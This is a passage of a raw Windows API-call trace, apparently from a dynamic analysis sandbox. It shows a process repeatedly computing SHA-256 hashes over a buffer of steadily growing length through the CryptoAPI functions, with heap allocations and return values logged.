	[0193.870] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.870] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.870] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0193.870] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.870] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309438
	[0193.870] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309438, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309438, pdwDataLen=0x1283b0) returned 1
	[0193.870] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.870] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.871] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.871] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.871] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0193.871] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.871] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309460
	[0193.871] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309460, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309460, pdwDataLen=0x1283b0) returned 1
	[0193.871] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.871] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.871] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.871] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.871] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0193.871] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.871] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309488
	[0193.872] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309488, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309488, pdwDataLen=0x1283b0) returned 1
	[0193.872] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.872] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.872] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.872] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.872] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0193.872] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.872] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23094b0
	[0193.872] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23094b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23094b0, pdwDataLen=0x1283b0) returned 1
	[0193.872] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.872] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.872] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.872] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.872] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0193.872] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.872] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23094d8
	[0193.872] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23094d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23094d8, pdwDataLen=0x1283b0) returned 1
	[0193.873] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.873] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.873] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.873] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.873] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0193.873] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.873] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309500
	[0193.873] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309500, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309500, pdwDataLen=0x1283b0) returned 1
	[0193.873] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.873] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.873] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.873] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.873] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0193.874] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.874] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309528
	[0193.874] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309528, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309528, pdwDataLen=0x1283b0) returned 1
	[0193.874] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.874] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.874] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.874] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.874] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0193.874] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.874] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309550
	[0193.874] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309550, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309550, pdwDataLen=0x1283b0) returned 1
	[0193.874] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.874] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.874] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.874] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.874] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0193.875] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.875] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309578
	[0193.875] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309578, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309578, pdwDataLen=0x1283b0) returned 1
	[0193.875] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.875] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.875] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.875] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.875] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0193.875] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.875] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23095a0
	[0193.875] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23095a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23095a0, pdwDataLen=0x1283b0) returned 1
	[0193.875] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.875] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.875] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.876] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.876] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0193.876] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.876] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23095c8
	[0193.876] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23095c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23095c8, pdwDataLen=0x1283b0) returned 1
	[0193.876] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.876] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.876] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.876] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.876] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0193.876] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.876] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23095f0
	[0193.876] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23095f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23095f0, pdwDataLen=0x1283b0) returned 1
	[0193.876] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.876] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.876] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.877] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.877] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0193.877] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.877] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309618
	[0193.877] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309618, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309618, pdwDataLen=0x1283b0) returned 1
	[0193.877] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.877] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.877] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.877] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.877] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0193.877] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.877] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309640
	[0193.877] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309640, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309640, pdwDataLen=0x1283b0) returned 1
	[0193.877] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.877] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.877] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.878] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.878] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0193.878] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309668
	[0193.878] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309668, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309668, pdwDataLen=0x1283b0) returned 1
	[0193.878] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.878] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.878] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.878] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.878] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0193.878] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309690
	[0193.878] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309690, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309690, pdwDataLen=0x1283b0) returned 1
	[0193.878] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.878] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.878] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.879] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.879] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0193.879] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.879] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23096b8
	[0193.879] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23096b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23096b8, pdwDataLen=0x1283b0) returned 1
	[0193.879] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.879] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.879] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.879] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.879] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0193.879] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.879] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23096e0
	[0193.879] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23096e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23096e0, pdwDataLen=0x1283b0) returned 1
	[0193.879] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.879] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.879] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.880] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.880] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0193.880] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.880] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309708
	[0193.880] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309708, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309708, pdwDataLen=0x1283b0) returned 1
	[0193.880] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.880] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.880] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.880] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.880] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0193.880] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.880] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309730
	[0193.880] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309730, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309730, pdwDataLen=0x1283b0) returned 1
	[0193.880] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.880] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.880] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.881] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.881] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0193.881] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.881] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309758
	[0193.881] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309758, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309758, pdwDataLen=0x1283b0) returned 1
	[0193.881] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.881] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.881] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.881] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.881] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0193.881] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.881] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309780
	[0193.881] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309780, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309780, pdwDataLen=0x1283b0) returned 1
	[0193.881] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.881] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.881] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.882] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.882] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0193.882] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.882] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23097a8
	[0193.882] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23097a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23097a8, pdwDataLen=0x1283b0) returned 1
	[0193.882] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.882] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.882] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.882] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.882] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0193.882] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.882] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23097d0
	[0193.882] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23097d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23097d0, pdwDataLen=0x1283b0) returned 1
	[0193.882] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.882] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.882] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.883] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.883] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0193.883] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.883] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23097f8
	[0193.883] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23097f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23097f8, pdwDataLen=0x1283b0) returned 1
	[0193.883] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.883] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.883] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.883] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
